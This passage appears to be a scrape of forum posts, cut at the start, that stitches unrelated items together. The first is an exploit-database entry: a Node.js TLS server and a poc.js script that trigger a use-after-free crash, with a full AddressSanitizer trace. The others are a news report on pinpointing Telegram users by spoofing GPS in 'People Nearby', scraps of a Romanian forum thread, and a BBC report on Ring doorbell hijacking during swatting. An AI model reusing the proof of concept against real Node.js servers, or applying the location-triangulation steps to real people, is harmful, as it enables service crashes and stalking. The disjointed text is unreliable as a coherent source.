WjBFMQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwY SW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcD QgAEItqm+pYj3Ca8bi5mBs+H8xSMxuW2JNn4I+kw3aREsetLk8pn3o81PWBiTdSZ rGBGQSy+UAlQvYeE6Z/QXQk8azAKBggqhkjOPQQDAgNJADBGAiEA7Bdn4F87KqIe Y/ABy/XIXXpFUb2nyv3zV7POQi2lPcECIQC3UWLmfiedpiIKsf9YRIyO0uEood7+ glj2R1NNr1X68w== -----END CERTIFICATE-----` const options = { key: key, cert: cert, }; https.createServer(options, function (req, res) { res.writeHead(200); res.end(\"hello world\ \"); }).listen(4444); --- poc.js: const tls = require('tls') var socket = tls.connect(4444, 'localhost', {rejectUnauthorized : false}, () => { console.log(\"connected\") socket.write(\"GET / HTTP/1.1\\ Host: localhost\\ Connection: Keep-alive\\ \\ \") socket.write(\"GET / HTTP/1.1\\ Host: localhost\\ Connection: Keep-alive\\ \\ \") socket.write(\"GET / HTTP/1.1\\ Host: localhost\\ Connection: Keep-alive\\ \\ \") }) socket.on('data', () => { socket.destroy() }) The POC triggers a crash when server.js is run on an ASAN enabled build of node.js: ==1408671==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000011138 at pc 0x0000011929b6 bp 0x7ffc8c2243f0 sp 0x7ffc8c2243e8 READ of size 8 at 0x608000011138 thread T0 #0 0x11929b5 in std::__uniq_ptr_impl<v8::BackingStore, std::default_delete<v8::BackingStore> >::_M_ptr() const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:154:42 #1 0x1192974 in std::unique_ptr<v8::BackingStore, std::default_delete<v8::BackingStore> >::get() const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:361:21 #2 0x1193fb4 in std::unique_ptr<v8::BackingStore, std::default_delete<v8::BackingStore> >::operator bool() const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:375:16 #3 0x1190415 in node::AllocatedBuffer::data() /pwd/out/../src/allocated_buffer-inl.h:79:8 #4 0x16f8a79 in node::WriteWrap::SetAllocatedStorage(node::AllocatedBuffer&&) /pwd/out/../src/stream_base-inl.h:247:3 #5 0x16f1141 in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:172:15 #6 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29 #7 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3 #8 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36 #9 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5 #10 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1 #11 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df) 0x608000011138 is located 24 bytes inside of 88-byte region [0x608000011120,0x608000011178) freed by thread T0 here: #0 0xe79b1d in operator delete(void*) (/p0/node/node-v14.11.0/out/Debug/node+0xe79b1d) #1 0x1707177 in node::SimpleWriteWrap<node::AsyncWrap>::~SimpleWriteWrap() /pwd/out/../src/stream_base.h:418:7 #2 0xf943be in node::BaseObject::decrease_refcount() /pwd/out/../src/base_object-inl.h:203:7 #3 0x10886e6 in node::BaseObjectPtrImpl<node::AsyncWrap, false>::~BaseObjectPtrImpl() /pwd/out/../src/base_object-inl.h:248:12 #4 0x13c2a3c in node::StreamReq::Dispose() /pwd/out/../src/stream_base-inl.h:40:1 #5 0x16f794c in node::WriteWrap::OnDone(int) /pwd/out/../src/stream_base.cc:591:3 #6 0x10e71f8 in node::StreamReq::Done(int, char const*) /pwd/out/../src/stream_base-inl.h:261:3 #7 0x1921f95 in node::TLSWrap::InvokeQueued(int, char const*) /pwd/out/../src/tls_wrap.cc:101:8 #8 0x1927f39 in node::TLSWrap::EncOut() /pwd/out/../src/tls_wrap.cc:356:5 #9 0x192e258 in node::TLSWrap::DoWrite(node::WriteWrap*, uv_buf_t*, unsigned long, uv_stream_s*) /pwd/out/../src/tls_wrap.cc:820:3 #10 0x13b50dd in node::StreamBase::Write(uv_buf_t*, unsigned long, uv_stream_s*, v8::Local<v8::Object>) /pwd/out/../src/stream_base-inl.h:193:9 #11 0x16f108f in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:169:27 #12 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29 #13 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3 #14 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36 #15 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5 #16 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1 #17 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df) previously allocated by thread T0 here: #0 0xe792bd in operator new(unsigned long) (/p0/node/node-v14.11.0/out/Debug/node+0xe792bd) #1 0x16f81c2 in node::StreamBase::CreateWriteWrap(v8::Local<v8::Object>) /pwd/out/../src/stream_base.cc:629:10 #2 0x13b4fb0 in node::StreamBase::Write(uv_buf_t*, unsigned long, uv_stream_s*, v8::Local<v8::Object>) /pwd/out/../src/stream_base-inl.h:191:25 #3 0x16f108f in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:169:27 #4 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29 #5 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3 #6 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36 #7 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5 #8 0x1ca81e0 in v8::internal::Builtin_HandleApiCall(int, unsigned long*, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:129:1 #9 0x3e096df in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_BuiltinExit (/p0/node/node-v14.11.0/out/Debug/node+0x3e096df) #10 0x3c06181 in Builtins_InterpreterEntryTrampoline (/p0/node/node-v14.11.0/out/Debug/node+0x3c06181) #11 0x3c06181 in Builtins_InterpreterEntryTrampoline (/p0/node/node-v14.11.0/out/Debug/node+0x3c06181) SUMMARY: AddressSanitizer: heap-use-after-free /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:154:42 in std::__uniq_ptr_impl<v8::BackingStore, std::default_delete<v8::BackingStore> >::_M_ptr() const Shadow bytes around the buggy address: 0x0c107fffa1d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa1e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa1f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa200: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fffa210: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c107fffa220: fa fa fa fa fd fd fd[fd]fd fd fd fd fd fd fd fa 0x0c107fffa230: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa240: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa250: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa260: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fffa270: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1408671==ABORTING Credits: Felix Wilhelm of Google Project Zero # 0day.today [2021-01-07] # Source

The “People Nearby” feature in the secure messaging app can be abused to unmask a user’s precise location, a researcher said. A feature that allows Telegram users to see who’s nearby can be misused to pinpoint your exact distance to other users – by spoofing one’s latitude and longitude. According to bug-hunter Ahmed Hassan, the “People Nearby” feature could allow an attacker to triangulate the location of unsuspecting Telegram users. The feature is disabled by default, but as Hassan pointed out, “Users who enable this feature are not aware they are basically publishing their precise location.” The feature lists exactly how far people are from one’s location (1.3 miles and so on). This isn’t an issue as long as that number remains a radius. But it’s possible to spoof one’s location for three different points, and then use the resulting three distances to precisely pinpoint where a target is, the researcher found. To spoof a GPS location, an adversary has various options, but the easiest method, Hassan noted in a Monday blog, is to “just walk around the area, collect the GPS latitude and longitude of yourself, and how far the target person is from you (super easy).” Another option is to use a GPS-spoofing app. Armed with the three locations, an attacker can then open Google Earth Pro, plug in the spoofed locations, and use a ruler to find the middle point between the three. For Telegram’s part, the company said it doesn’t regard the issue as a bug, and declined Hassan’s security report. Telegram did not immediately return a request for comment. Via threatpost.com

https://github.com/samwize/python-email-crawler 10 ani. La multi ani!

ce poze sa iti mai dau? http://letmegooglethat.com/?q=2.0+2.5"+Hard+drive+enclosure+Gembird http://letmegooglethat.com/?q=WD1600AAJS-00L7A0%2C+DCM+HANNHTJCH%2C+Western+Digital+160GB+SATA+3.5+harde+schijf

Amazon's Ring doorbells have been compromised in some swatting attacks Hackers have livestreamed police raids on innocent households after hijacking their victims' smart home devices and making a hoax call to the authorities, the FBI has warned. It said offenders had even spoken to responding officers via the hacked kit. It marks the latest escalation of a crime known as "swatting", in which offenders fool armed police or other emergency responders to go to a target's residence. The FBI said there were "deadly" risks. A fake call about a hostage situation led to police shooting a man in Kansas three years ago, and there have been non-fatal injuries in other cases. Shouted insults The FBI said it believed the latest twist on the "prank" was able to be carried out because the victims had reused passwords from other services when setting up their smart devices. Lists of hacked credentials are frequently bought and sold via illegal markets. And offenders often run the details stolen from one service through others to find where passwords have been reused. There have also been reports of security flaws in some products, including smart doorbells, which have allowed hackers to steal network passwords and gain access to other smart devices sharing the same wi-fi. The apps and websites used to set up such products often store the user's name and address in their account settings in order to offer location-specific services. The notice does not refer to any specific incident, but there have been related press reports in recent weeks. In November, NBC News highlighted a case in which police went to a Florida home after receiving a fake 911 call from a man saying he had killed his wife and was hoarding explosives. When they left the building after discovering it to be a hoax, officers reported hearing someone insult them via the property's internet-connected Ring doorbell. In another incident the same month in Virginia, police reported hearing the hacker shout "help me" after arriving at the home of a person they had told might be about to kill himself. When they questioned the attacker via the device, he claimed to have compromised four different cameras at the location and to be charging others $5 to watch online. A further event was also reported in Georgia in which the attacker shouted racial abuse at his victims after the police stood down, and claimed to have carried out more than a dozen such hacks that day. Ring has denied its own systems have been compromised. It uses two-step verification, which means device owners can only access their accounts from a new computer if they enter a code emailed or sent to them via text message. However, if either of those forms of communication are also compromised the user remains vulnerable. As a consequence, the FBI has advised smart device owners to ensure they provide a different complex passcode to each online service they use. Via bbc.com